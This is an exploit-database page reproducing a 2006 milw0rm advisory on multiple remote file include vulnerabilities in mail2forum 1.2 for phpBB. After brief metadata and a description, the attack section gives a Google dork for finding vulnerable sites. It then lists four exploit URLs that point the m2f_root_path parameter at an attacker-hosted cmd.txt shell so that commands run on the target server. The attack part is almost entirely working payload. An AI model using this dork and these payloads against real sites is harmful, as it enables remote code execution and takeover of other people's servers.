header-logo
Suggest Exploit
vendor:
mail2forum
by:
OLiBekaS
7,5
CVSS
HIGH
Multiple Remote File Include
98
CWE
Product Name: mail2forum
Affected Version From: 1.2
Affected Version To: 1.2
Patch Exists: No
Related CWE: CVE-2006-3730
CPE: a:mail2forum:mail2forum:1.2
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2006

mail2forum <= 1.2 Multiple Remote File Include Vulnerabilities

mail2forum is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to execute arbitrary remote PHP code in the context of the webserver process.

Mitigation:

No known mitigation
Source

Exploit-DB raw data:

Title : mail2forum <= 1.2 Multiple Remote File Include Vulnerabilities

###############################################################################

Discovered By OLiBekaS

-----------------------------------------------------------------------------

Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : mail for phpbb (bulletin board/forum software)
version : latest version [ 1.2 ]
URL : http://www.www.mail2forum.com

-----------------------------------------------------------------------------

dork        : allinurl:/m2f_usercp.php?

Exploit     : 
http://[target]/[forum_path]/m2f/m2f_phpbb204.php?m2f_root_path=http://[attacker]/cmd.txt?&cmd=ls
http://[target]/[forum_path]/m2f/m2f_forum.php?m2f_root_path=http://[attacker]/cmd.txt?&cmd=ls
http://[target]/[forum_path]/m2f/m2f_mailinglist.php?m2f_root_path=http://[attacker]/cmd.txt?&cmd=ls
http://[target]/[forum_path]/m2f/m2f_cron.php?m2f_root_path=http://[attacker]/cmd.txt?&cmd=ls

# milw0rm.com [2006-07-17]

Navigation

Suggest Exploit

Services By CQR